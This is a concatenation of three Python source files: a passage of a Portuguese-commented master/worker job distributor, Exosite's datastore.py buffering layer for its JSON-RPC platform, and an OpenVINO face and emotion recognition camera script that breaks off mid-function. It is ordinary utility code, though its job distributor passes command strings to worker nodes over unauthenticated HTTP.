myvars["fase02"] = self.fase02
myvars["fase03"] = self.fase03
#myvars["total_pro"] = self.total_pro
#myvars["base_init"] = self.base_init
myvars["path_ini"] = 'true'
myvars["nfs_path"] = len(self.nfs_path)
myvars["processando"] = 'true'
myvars["status"] = 'true'
else:
print 'Status do processamento'
print self.threadProcessamento
print self.flagProcesso
'''myvars["nfs_path"] = len(self.nfs_path)'''
myvars["nfs_path"] = os.getcwd()
myvars["processando"] = 'false'
myvars["path_ini"] = 'true'
myvars["status"] = 'false'
elif myvars.get('metodo') == 'startprocessos':
if not self.flagProcesso:
if self.escravo_count>0:
#definindo fases
if myvars.get('fase01',False):
self.fase01 = myvars.get('fase01')
if myvars.get('fase02',False):
self.fase02 = myvars.get('fase02')
if myvars.get('fase03',False):
self.fase03 = myvars.get('fase03')
#if myvars.get('total_pro',False):
# self.total_pro = int(myvars.get('total_pro'))
# self.process_count = 0
# self.itera_count = 0
#if myvars.get('base_init',False):
# self.base_init = myvars.get('base_init')
if myvars.get('parametros',False):
#print 'PARAMETROS'
#print myvars.get('parametros').encode("utf-8")
#print myvars.get('parametros')
#print urllib.unquote(myvars.get('parametros').encode("utf-8"))
#raw_input('Aperte ENTER para prosseguir: ')
self.parametros = json.loads(urllib.unquote(myvars.get('parametros').encode("utf-8")))
p=[]
for j in self.parametros:
p.append(self.parametros.get(json.dumps(j).replace('"','')))
self.parametros = list(itertools.product(*p))
self.total_pro = len(self.parametros)
self.process_count = 0
self.itera_count = 0
self.threadProcessamento=Thread( target=controleDeFluxo, args = (self,) )
self.threadProcessamento.start()
print 'Thread iniciada'
print self.threadProcessamento.is_alive()
#definir valor da flag
self.flagProcesso = True
myvars["status"] = 'true'
else:
#nao tem processo para iniciar
myvars["status"] = 'false'
else:
print 'processando'
myvars["status"] = 'false'
elif myvars.get('metodo') == 'add_no':
pp=1
if myvars.get('pp',False):
pp = myvars.get('pp')
if myvars.get('ip',False):
#verificar se esse ip ja foi cadastrado
nalista = False
for escravo in self.lista_escravo:
if escravo.ip == myvars.get('ip'):
nalista = True
if not nalista:
self.escravo_count = self.escravo_count+int(pp)
self.lista_escravo.append(Escravo(self.escravo_count, myvars.get('ip'), int(pp)))
elif myvars.get('metodo') == 'list_nfs_files':
print self.nfs_path
if len(self.nfs_path) >0:
i=0
files=[]
dirList=os.listdir(self.nfs_path)
for fname in dirList:
if os.path.isfile(self.nfs_path+'/'+fname):
if i==1:
files.append(',')
files.append('{"file":"'+fname+'"}')
i=1
#myvars["files"] = '[{"file":"file_exec"},{"file":"file_exec2"}]';
myvars["files"] = '['+''.join(files)+']';
print myvars["files"]
if myvars.get('_dc',False):
del myvars["_dc"]
if myvars.get('metodo',False):
del myvars["metodo"]
# {"files":[{"file":"/home/renedet/nfspath/file_exec"},{"file":"/home/renedet/nfspath/file_exec2"}]}
elif myvars.get('metodo') == 'break_process':
'''
if not isinstance(self.threadProcessamento, types.NoneType):
if self.threadProcessamento.isAlive():
self.threadProcessamento
'''
pass
elif myvars.get('metodo') == 'setup':
if myvars.get('nfs_path',False):
if os.path.isdir(urllib.unquote(myvars['nfs_path'].encode("utf-8"))):
self.nfs_path = urllib.unquote(myvars['nfs_path'].encode("utf-8"))
myvars['nfs_path'] = 'true'
print self.nfs_path
else:
myvars['nfs_path'] = 'false'
if myvars.get('num_process',False):
self.max_active_process = myvars['num_process']
#Falta verificar quantos processos suporta, agora e como fazer isso?
myvars["status"] = 'true'
return myvars
def controleEscravo(gerenciadormestre,escravo,processo,idprocesso):
erro = True
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(idprocesso)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+' '.join(processo))
url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(idprocesso)+'&cmd='+urllib.quote(gerenciadormestre.fase02+' '+' '.join(processo))
print 'URL metodo=setprocesso'
print url
#url = urllib.unquote(url)
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
print auxjson
if 0<len(auxjson):
resultado = json.loads(auxjson)
print resultado.get('status')
if resultado.get('status'):
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=startprocessos')
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
erro = False
teste = True
# verificando se terminou de processar ou se esta ativo
while teste:
time.sleep(1)
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
print 'verificando se processamento terminou'
if len(auxjson)==0:
time.sleep(2)
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
if len(auxjson)==0:
# devolvendo processo para lista
gerenciadormestre.lista_escravo.append(processo)
# marcando escravo como inativo
escravo.live=False
#escravo.processando=False
teste = False
erro = True
break;
if len(auxjson)>0:
processos = json.loads(auxjson)
processos = processos.get('processo')
p=0
for pro in processos:
print pro.get('status')
if 'finished'!=pro.get('status'):
p+=1
if p==0:
# todos os processos enceraram
teste = False
#escravo.processando=False
if erro:
# devolvendo processo para lista
gerenciadormestre.lista_escravo.append(processo)
# marcando escravo como inativo
escravo.live=False
def controleDeFluxo(gerenciadormestre):
# verificando se fase02 existe
if os.path.exists(gerenciadormestre.nfs_path):
if os.path.isdir(gerenciadormestre.nfs_path):
while True:
aux = True
#iniciando fase01 (sem parametros)
gerenciadormestre.execFase = 1
print 'Verificando result.mat'
# verifica se result.mat existe para executar fase01
if os.path.isfile(gerenciadormestre.nfs_path+'/result.mat'):
#processar gerenciadormestre.fase01
print 'Iniciando fase01'
ge = GerenciadorEscravo()
ge.setSetup(gerenciadormestre.nfs_path,'',0)
#gerenciadormestre.process_count+=1
#nao conta processos internos
print 'Processo adicionado?'
# adiciona fase01 na lista para ser executado
print ge.setProcesso('./'+gerenciadormestre.fase01,1)
print 'Processo iniciado?'
# inicia execucao de fase01
print ge.startProcessos()
print 'Lista de Processos '+str(len(ge.lista_processo)) #0!!!
for processo in ge.lista_processo:
print 'Status do processo: '+processo.status
#while processo.poll() < 0:
while isinstance(processo.processo.poll(),types.NoneType):
#espera x segundos para testar de novo
time.sleep(1)
# fase01 analisa result.mat para gerar true.file
if os.path.isfile(gerenciadormestre.nfs_path+'/true.file'):
print gerenciadormestre.nfs_path+'/true.file gerado!'
aux = False
else:
print '# '+str(gerenciadormestre.itera_count)
else:
print 'Pulou fase01'
#time.sleep(10)
if aux == False:
print 'Finalizando processamento!'
break
#else:
# print 'Valor de aux:'
# print aux
#iniciando fase02 (numiterac, filename, processo_id) processo_id e passado pelo escravo
gerenciadormestre.execFase = 2
#enviando processos para os nos
#falta definir o numero de processo para cada no
print 'Iniciando fase02'
gerenciadormestre.itera_count+=1
#time.sleep(10)
idprocesso=0
while 0 < len(gerenciadormestre.parametros) or gerenciadormestre.getEscravoProcessando():
#print 'verificando escravo livre'
# o problema ocorre se nao houver escravos ativos escravo.live==True
time.sleep(2)
for escravo in gerenciadormestre.lista_escravo:
#time.sleep(5)
#pprint (vars(escravo))
if escravo.live:
#print 'escravo processando'
#print escravo.getAlive()
#if False==escravo.processando:
if not escravo.getAlive():
#escravo.processando=True
#print 'escravo.pp'
print escravo.pp
processos_dist = gerenciadormestre.getTotalProcessos(escravo.pp)
print 'distribuindo processo'
print processos_dist
for i in range(1,processos_dist+1):
# contador de processos he diferente de len(gerenciadormestre.parametros)
idprocesso+=1
escravo.thread=Thread( target=controleEscravo, args = (gerenciadormestre,escravo,gerenciadormestre.parametros.pop(),idprocesso,) )
escravo.thread.start()
"""
#while gerenciadormestre.process_count < gerenciadormestre.total_pro:
while gerenciadormestre.process_count < len(gerenciadormestre.parametros):
#print 'process_count '+str(gerenciadormestre.process_count)
#print 'total_pro '+str(gerenciadormestre.total_pro)
#local_process_count = gerenciadormestre.process_count
# distribuindo processos para os nos
for escravo in gerenciadormestre.lista_escravo:
#gerenciadormestre.process_count+=1
#url = 'http://'+escravo.ip+'/ajax?metodo=setprocesso&pp='+str(escravo.pp)+'&idprocess='+str(gerenciadormestre.process_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init+' '+str(gerenciadormestre.process_count))
#url = 'http://'+escravo.ip+'/ajax?metodo=setprocesso&pp='+str(escravo.pp)+'&idprocess='+str(gerenciadormestre.process_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init)
processos_dist = gerenciadormestre.getTotalProcessos(escravo.pp)
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&pp='+str(processos_dist)+'&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init)
# preciso guardar estes dados para poder recuperar caso fique fora do ar
# falta os parametros self.parametros
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&pp='+str(processos_dist)+'&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+str(gerenciadormestre.parametros[gerenciadormestre.itera_count]))
for i in range(1,processos_dist+1):
url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+str(gerenciadormestre.parametros[gerenciadormestre.itera_count]))
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
#time.sleep(1)
print auxjson
processos = json.loads(auxjson)
processos = processos.get('processo')
for p in processos:
if p.get('status',False):
print 'OK'
#local_process_count = gerenciadormestre.process_count
#solicitando para nos processarem
print 'Iniciando processos'
#time.sleep(10)
for escravo in gerenciadormestre.lista_escravo:
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=startprocessos')
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
#verifica de tempos em tempos se todos os nos terminaram de processar
#verificador...
print 'Verificando se processos terminaram'
#time.sleep(10)
verificador = 1
while verificador > 0:
verificador = 0
# menor tempo de processamento fase02
# 80 seg * 8 processos >= 1040 seg >= 17,33 minutos
time.sleep(30)
for escravo in gerenciadormestre.lista_escravo:
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
while True:
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
if len(auxjson)>0:
break
else:
escravo.live = False
# se caso nao houver resposta o metodo anterior
# tera que distribuir o processo para outro no
#print auxjson
processos = json.loads(auxjson)
processos = processos.get('processo')
for p in processos:
# enquanto todos os processos nao terminar
# de executar vai continuar verificando
if p.get('status') != 'finished':
verificador+=1
"""
# inicializando contator para proximo ciclo
#gerenciadormestre.Gprocess_count+=gerenciadormestre.process_count
#gerenciadormestre.process_count = 0
#se todos os nos finalizaram executa fase03
#iniciando fase03 (numiterac)
print 'Iniciando fase03'
#time.sleep(10)
gerenciadormestre.execFase = 3
#para gerar gerenciadormestre.nfs_path+'/result.mat'
ge = GerenciadorEscravo()
ge.setSetup(gerenciadormestre.nfs_path,'',0)
#gerenciadormestre.process_count+=1
print ge.setProcesso('./'+gerenciadormestre.fase03+' '+str(gerenciadormestre.itera_count),1)
print ge.startProcessos()
for processo in ge.lista_processo:
#esperando processo terminar
#while processo.poll() < 0:
while isinstance(processo.processo.poll(),types.NoneType):
#espera x segundos para testar de novo
time.sleep(1)
print 'Fim do ciclo '+str(gerenciadormestre.itera_count)
#time.sleep(10)
#incrementa iterador
#gerenciadormestre.itera_count+=1
else:
gerenciadormestre.flagProcesso = False
else:
gerenciadormestre.flagProcesso = False
gerenciadormestre.flagProcesso = False
|
datastore.py
|
#==============================================================================
# datastore.py
# Buffering, caching and batch functions for access to the Exosite Data
# Platform using the JSON RPC API over HTTP.
# This layer was written so that a system with many subcriber/provider tasks
# could simulataneously access the platform efficiently.
#==============================================================================
#
# Tested with python 2.6
#
# Copyright (c) 2014, Exosite LLC
# All rights reserved.
#
import threading
import time
import sys
import logging
from onep import OnepV1
from exceptions import OneException
# setup default configurations
transport_config = {'host': 'm2.exosite.com',
'port': '80',
'url': '/onep:v1/rpc/process',
'https': False,
'timeout': 3}
datastore_config = {'write_buffer_size': 1024,
'read_cache_size': 1024,
'read_cache_expire_time': 5,
'log_level': 'debug'}
log = logging.getLogger(__name__)
lock = threading.Lock()
class Datastore():
def __init__(self,
cik,
interval,
autocreate=False,
config=datastore_config,
transport=transport_config):
self._liveBuffer = dict()
self._recordBuffer = dict()
self._aliasDict = dict()
self._cache = dict()
self._cacheCount = 0
self._recordCount = 0
self._auto = autocreate
self._config = config
if 'https' in transport:
transport['https'] = False
self._conn = OnepV1(transport['host'],
transport['port'],
transport['url'],
transport['https'],
transport['timeout'])
self._cik = cik
if interval < 1:
interval = 1
self._interval = interval
def __bufferCount(self):
return len(self._liveBuffer) + self._recordCount
def __isBufferFull(self):
return self.__bufferCount() >= self._config['write_buffer_size']
def __isLiveBufferEmpty(self):
if self._liveBuffer:
return False
else:
return True
def __forceTerminate(self):
if self._killed and self._forceterminate:
self._liveBuffer.clear()
return True
else:
return False
# One platform queries below
def __lookup(self, alias, forcequery=False):
if (not forcequery) and alias in self._aliasDict:
return self._aliasDict[alias]
else:
status, res = self._conn.lookup(self._cik, 'alias', alias)
if not status:
self._aliasDict[alias] = False
return False
else:
self._aliasDict[alias] = res
return res
def __read(self,
alias,
count=1,
forcequery=False,
sort='desc',
starttime=None,
endtime=None):
rid = self.__lookup(alias, forcequery)
if None != starttime and None != endtime:
status, res = self._conn.read(
self._cik,
rid,
{"starttime": starttime,
"endtime": endtime,
"limit": count,
"sort": sort})
else:
status, res = self._conn.read(self._cik,
rid,
{"limit": count,
"sort": sort})
if not status:
raise OneException(
"Error message from one platform (read): %s" % res)
return res
def __record(self, alias, entries):
rid = self.__lookup(alias)
record_status, record_message = self._conn.record(self._cik,
rid,
entries)
if not (True == record_status and 'ok' == record_message):
msg = "Error message from one platform (record): %s"
raise OneException(msg % record_message)
return True
def __writegroup(self, entries):
data = list()
for (alias, value) in entries:
rid = self.__lookup(alias)
data.append([rid, value])
write_status, write_message = self._conn.writegroup(self._cik, data)
if not (True == write_status and 'ok' == write_message):
msg = "Error message from one platform (write): %s,%s"
raise OneException(msg % (value, write_message))
return True
def __createDataport(self,
alias,
name=None,
format="string",
preprocess=[],
count="infinity",
duration="infinity",
visibility='parent'):
if None == name:
name = alias
desc = {"format": format,
"name": name,
'visibility': visibility,
"retention": {"count": count,
"duration": duration},
"preprocess": preprocess}
create_status,rid = self._conn.create(self._cik, "dataport", desc)
if create_status:
map_status, map_message = self._conn.map(self._cik, rid, alias)
if map_status:
self._aliasDict[alias] = rid
return True
else:
self._conn.drop(self._cik, rid)
log.error(map_message)
return False
else:
log.error(rid)
return False
def __checkDataportExist(self, alias):
if self.__lookup(alias):
return True
else:
if self._auto:
if not self.__createDataport(
alias=alias,
format=self._auto['format'],
preprocess=self._auto['preprocess'],
count=self._auto['count'],
duration=self._auto['duration'],
visibility=self._auto['visibility']):
raise OneException("Fail to create dataport.")
return True
else:
m = "Data source does not exist while not in AUTO_CREATE mode."
log.warn(m)
return False
# Write buffer processing below
def __processJsonRPC(self):
while not self.__forceTerminate():
time.sleep(self._interval)
livedata = list()
lock.acquire()
try:
timestamp = int(time.time())
aliases = self._liveBuffer.keys()
for alias in aliases:
value = self._liveBuffer[alias]
try:
# create datasource if necessary
if self.__checkDataportExist(alias):
# Move to live data
livedata.append([alias, value])
msg = "Data to be written (alias,value): ('%s',%s)"
log.debug(msg % (alias, value))
except OneException:
# catch exception, add to recordBuffer
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
self._recordBuffer[alias].append(
[timestamp, value, True])
self._recordCount += 1
finally:
del self._liveBuffer[alias]
finally:
self._liveBuffer.clear()
lock.release()
# write live data
if livedata:
timestamp = int(time.time())
try:
self.__writegroup(livedata)
log.info("[Live] Written to 1p:" + str(livedata))
except OneException:
# go to historical data when write live data failure
e = sys.exc_info()[1]
msg = "Exception While Writing Live Data: {0}"
log.error(msg.format(e.message))
log.debug("Previous Exception For: {0}".format(livedata))
lock.acquire()
try:
for (alias, value) in livedata:
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
offset = True
self._recordBuffer[alias].append(
[timestamp, value, offset])
self._recordCount += 1
finally:
lock.release()
except Exception:
e = sys.exc_info()[1]
log.exception("Unknown Exception While Writing Data")
## write historical data
lock.acquire()
try:
aliases = self._recordBuffer.keys()
curtime = int(time.time())
for alias in aliases:
entries = self._recordBuffer[alias]
try:
if self.__checkDataportExist(alias):
recentry = list()
for entry in entries:
if True == entry[2]: # offset mode
offset = entry[0] - curtime
if offset == 0:
# Must be a negative number.
offset = -1
recentry.append([offset, entry[1]])
else:
recentry.append([entry[0], entry[1]])
if recentry:
try:
self.__record(alias, recentry)
log.info("[Historical] Written to 1p: "
+ alias + ", " + str(recentry))
self._recordCount -= len(entries)
del self._recordBuffer[alias]
except OneException:
e = sys.exc_info()[1]
if e.message.find("datapoint") != -1:
log.excption(e.message)
self._recordCount -= len(entries)
del self._recordBuffer[alias]
else:
del self._recordBuffer[alias]
except OneException:
e = sys.exc_info()[1]
log.error(e.message)
continue
finally:
lock.release()
if self._killed and not self._recordBuffer:
self._forceterminate = True
# Read cache routines below
def __addCacheData(self, alias, count, forcequery=False):
if self.__isCacheFull():
self.__clearCache()
self._cache[alias] = dict()
data = self.__refreshData(alias, count, forcequery)
if data:
self._cacheCount += 1
return data
def __isExpired(self, alias):
try:
expire = self._config['read_cache_expire_time']
return int(time.time()) - self._cache[alias]['time'] > expire
except:
return True
def __isCacheFull(self):
return self._cacheCount >= self._config['read_cache_size']
def __clearCache(self):
self._cache.clear()
self._cache = dict()
self._cacheCount = 0
def __refreshData(self, alias, count, forcequery=False):
try:
time.sleep(1)
data = self.__read(alias,
count,
forcequery)
self._cache[alias]['data'] = data
self._cache[alias]['time'] = int(time.time())
return data
except OneException:
e = sys.exc_info()[1]
log.error(e.message)
except Exception:
e = sys.exc_info()[1]
log.excpetion("Unknown Exception While Refreshing Data")
return False
# Public methods below
def isThreadAlive(self):
return self._thread.isAlive()
def comment(self,
alias,
visibility,
commentstr):
rid = self.__lookup(alias)
if rid:
status, message = self._conn.comment(self._cik,
rid,
visibility,
commentstr)
if status:
return True
return False
def createDataport(self,
alias,
format,
name=None,
preprocess=[],
count=0,
duration=0,
visibility="public"):
rid = self.__lookup(alias)
if rid:
return False, "Alias already existed."
else:
if self.__createDataport(alias,
name,
format,
preprocess,
count,
duration,
visibility):
return True, True
else:
return False, "Failed to create Dataport."
def read(self, alias, count=1, forcequery=False):
if alias in self._cache: # has cache data
if self.__isExpired(alias) or count != len(self._cache[alias]['data']):
return self.__refreshData(alias, count, forcequery)
else:
return self._cache[alias]['data']
else: # no cache data
return self.__addCacheData(alias, count, forcequery)
def record(self, alias, entries):
if self.__isBufferFull() or not (self._auto or self.__lookup(alias)):
return False
lock.acquire()
try:
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
for (t, value) in entries:
recentry = [t, value, False]
self._recordBuffer[alias].append(recentry)
finally:
lock.release()
def restart(self):
self.stop(force=True)
self.start()
def start(self, daemon=False):
time.sleep(1)
self._killed = False
self._forceterminate = False
self._thread = threading.Thread(target=self.__processJsonRPC)
self._thread.setDaemon(daemon)
self._thread.start()
def stop(self, force=False):
self._killed = True
self._forceterminate = force
def write(self, alias, value):
if self.__isBufferFull() or not (self._auto or self.__lookup(alias)):
return False
else:
lock.acquire()
try:
if alias in self._liveBuffer:
self._liveBuffer[alias] = value
msg = "Update the (alias,value) in buffer:%s,%s"
log.debug(msg % (alias, value))
return False
else:
self._liveBuffer[alias] = value
finally:
lock.release()
log.debug("Current buffer count: %s" % self.__bufferCount())
log.debug("Add to buffer:%s,%s" % (alias, value))
return True
|
main.py
|
##############################################
# sudo apt-get install -y python3-picamera
# sudo -H pip3 install imutils --upgrade
##############################################
import sys
import numpy as np
import cv2, io, time, argparse, re
from os import system
from os.path import isfile, join
from time import sleep
import multiprocessing as mp
try:
from armv7l.openvino.inference_engine import IENetwork, IEPlugin
except:
from openvino.inference_engine import IENetwork, IEPlugin
import heapq
import threading
try:
from imutils.video.pivideostream import PiVideoStream
from imutils.video.filevideostream import FileVideoStream
import imutils
except:
pass
lastresults = None
threads = []
processes = []
frameBuffer = None
results = None
fps = ""
detectfps = ""
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
cam = None
vs = None
window_name = ""
elapsedtime = 0.0
g_plugin = None
g_inferred_request = None
g_heap_request = None
g_inferred_cnt = 0
g_number_of_allocated_ncs = 0
LABELS = ["neutral", "happy", "sad", "surprise", "anger"]
COLORS = np.random.uniform(0, 255, size=(len(LABELS), 3))
def camThread(LABELS, resultsEm, frameBuffer, camera_width, camera_height, vidfps, number_of_camera, mode_of_camera):
global fps
global detectfps
global lastresults
global framecount
global detectframecount
global time1
global time2
global cam
global vs
global window_name
if mode_of_camera == 0:
cam = cv2.VideoCapture(number_of_camera)
if cam.isOpened() != True:
print("USB Camera Open Error!!!")
sys.exit(0)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
window_name = "USB Camera"
else:
vs = PiVideoStream((camera_width, camera_height), vidfps).start()
sleep(3)
window_name = "PiCamera"
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
# USB Camera Stream or PiCamera Stream Read
color_image = None
if mode_of_camera == 0:
s, color_image = cam.read()
if not s:
continue
else:
color_image = vs.read()
if frameBuffer.full():
frameBuffer.get()
frames = color_image
height = color_image.shape[0]
width = color_image.shape[1]
frameBuffer.put(color_image.copy())
res = None
if not resultsEm.empty():
res = resultsEm.get(False)
detectframecount += 1
imdraw = overlay_on_image(frames, res)
lastresults = res
else:
imdraw = overlay_on_image(frames, lastresults)
cv2.imshow(window_name, cv2.resize(imdraw, (width, height)))
if cv2.waitKey(1)&0xFF == ord('q'):
sys.exit(0)
## Print FPS
framecount += 1
if framecount >= 25:
fps = "(Playback) {:.1f} FPS".format(time1/25)
detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
time2 += elapsedTime
# l = Search list
# x = Search target value
def searchlist(l, x, notfoundvalue=-1):
if x in l:
return l.index(x)
else:
return notfoundvalue
def async_infer(ncsworkerFd, ncsworkerEm):
while True:
ncsworkerFd.predict_async()
ncsworkerEm.predict_async()
class BaseNcsWorker():
def __init__(self, devid, model_path, number_of_ncs):
global g_plugin
global g_inferred_request
global g_heap_request
global g_inferred_cnt
global g_number_of_allocated_ncs
self.devid = devid
if number_of_ncs == 0:
self.num_requests = 4
elif number_of_ncs == 1:
self.num_requests = 4
elif number_of_ncs == 2:
self.num_requests = 2
elif number_of_ncs >= 3:
self.num_requests = 1
print("g_number_of_allocated_ncs =", g_number_of_allocated_ncs, "number_of_ncs =", number_of_ncs)
if g_number_of_allocated_ncs < 1:
self.plugin = IEPlugin(device="MYRIAD")
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
g_plugin = self.plugin
g_inferred_request = self.inferred_request
g_heap_request = self.heap_request
g_inferred_cnt = self.inferred_cnt
g_number_of_allocated_ncs += 1
else:
self.plugin = g_plugin
self.inferred_request = g_inferred_request
self.heap_request = g_heap_request
self.inferred_cnt = g_inferred_cnt
self.model_xml = model_path + ".xml"
self.model_bin = model_path + ".bin"
self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
self.input_blob = next(iter(self.net.inputs))
self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
class NcsWorkerFd(BaseNcsWorker):
def __init__(self, devid, frameBuffer, resultsFd, model_path, number_of_ncs):
super().__init__(devid, model_path, number_of_ncs)
self.frameBuffer = frameBuffer
self.resultsFd = resultsFd
def image_preprocessing(self, color_image):
prepimg = cv2.resize(color_image, (300, 300))
prepimg = prepimg[np.newaxis, :, :, :] # Batch size axis add
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def predict_async(self):
try:
if self.frameBuffer.empty():
return
color_image = self.frameBuffer.get()
prepimg = self.image_preprocessing(color_image)
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1:
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
self.exec_net.requests[reqnum].wait(-1)
out = self.exec_net.requests[reqnum].outputs["detection_out"].flatten()
detection_list = []
face_image_list = []
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
if confidence > 0.3:
detection[3] = int(detection[3] * color_image.shape[1])
detection[4] = int(detection[4] * color_image.shape[0])
detection[5] = int(detection[5] * color_image.shape[1])
detection[6] = int(detection[6] * color_image.shape[0])
if (detection[6] - detection[4]) > 0 and (detection[5] - detection[3]) > 0:
detection_list.extend(detection)
face_image_list.extend([color_image[int(detection[4]):int(detection[6]), int(detection[3]):int(detection[5]), :]])
if len(detection_list) > 0:
self.resultsFd.put([detection_list, face_image_list])
self.inferred_request[reqnum] = 0
except:
import traceback
traceback.print_exc()
class NcsWorkerEm(BaseNcsWorker):
def __init__(self, devid, resultsFd, resultsEm, model_path, number_of_ncs):
super().__init__(devid, model_path, number_of_ncs)
self.resultsFd = resultsFd
self.resultsEm = resultsEm
def image_preprocessing(self, color_image):
try:
prepimg = cv2.resize(color_image, (64, 64))
except:
prepimg = np.full((64, 64, 3), 128)
prepimg = prepimg[np.newaxis, :, :, :] # Batch size axis add
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def predict_async(self):
try:
if self.resultsFd.empty():
return
resultFd = self.resultsFd.get()
detection_list = resultFd[0]
face_image_list = resultFd[1]
emotion_list = []
max_face_image_list_cnt = len(face_image_list)
image_idx = 0
end_cnt_processing = 0
heapflg = False
cnt = 0
dev = 0
if max_face_image_list_cnt <= 0:
detection_list.extend([""])
self.resultsEm.put([detection_list])
return
while True:
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1 and image_idx <= (max_face_image_list_cnt - 1) and len(face_image_list[image_idx]) > 0:
if len(face_image_list[image_idx]) == []:
image_idx += 1
continue
else:
prepimg = self.image_preprocessing(face_image_list[image_idx])
image_idx += 1
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
heapflg = True
if heapflg:
cnt, dev = heapq.heappop(self.heap_request)
heapflg = False
if self.exec_net.requests[dev].wait(0) == 0:
self.exec_net.requests[dev].wait(-1)
out = self.exec_net.requests[dev].outputs["prob_emotion"].flatten()
emotion = LABELS[int(np.argmax(out))]
detection_list.extend([emotion])
self.resultsEm.put([detection_list])
self.inferred_request[dev] = 0
end_cnt_processing += 1
if end_cnt_processing >= max_face_image_list_cnt:
break
else:
heapq.heappush(self.heap_request, (cnt, dev))
heapflg = True
except:
import traceback
traceback.print_exc()
def inferencer(resultsFd, resultsEm, frameBuffer, number_of_ncs, fd_model_path, em_model_path):
# Init infer threads
threads = []
for devid in range(number_of_ncs):
# Face Detection, Emotion Recognition start
thworker = threading.Thread(target=async_infer, args=(NcsWorkerFd(devid, frameBuffer, resultsFd, fd_model_path, number_of_ncs),
NcsWorkerEm(devid, resultsFd, resultsEm, em_model_path, 0),))
thworker.start()
threads.append(thworker)
print("Thread-"+str(devid))
for th in threads:
th.join()
def overlay_on_image(frames, object_infos):
try:
color_image = frames
if isinstance(object_infos, type(None)):
return color_image
# Show images
height = color_image.shape[0]
width = color_image.shape[1]
entire_pixel = height * width
img_cp = color_image.copy()
for object_info in object_infos:
if object_info[2] == 0.0:
break
if (not np.isfinite(object_info[0]) or
not np.isfinite(object_info[1]) or
not np.isfinite(object_info[2]) or
not np.isfinite(object_info[3]) or
not np.isfinite(object_info[4]) or
not np.isfinite(object_info[5]) or
not np.isfinite(object_info[6])):
continue
min_score_percent = 60
source_image_width = width
source_image_height = height
percentage = int(object_info[2] * 100)
if (percentage <= min_score_percent):
continue
box_left = int(object_info[3])
box_top = int(object_info[4])
box_right = int(object_info[5])
box_bottom = int(object_info[6])
emotion = str(object_info[7])
label_text = emotion + " (" + str(percentage) + "%)"
box_color = COLORS[searchlist(LABELS, emotion, 0)]
box_thickness = 2
cv2.rectangle(img_cp, (box_left, box_top), (box_right, box_bottom), box_color, box_thickness)
label_background_color = (125, 175, 75)
label_text_color = (255, 255, 255)
label_size = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)[0]
label_left = box_left
label_top = box_top - label_size[1]
if (label_top < 1):
label_top = 1
label_right = label_left + label_size[0]
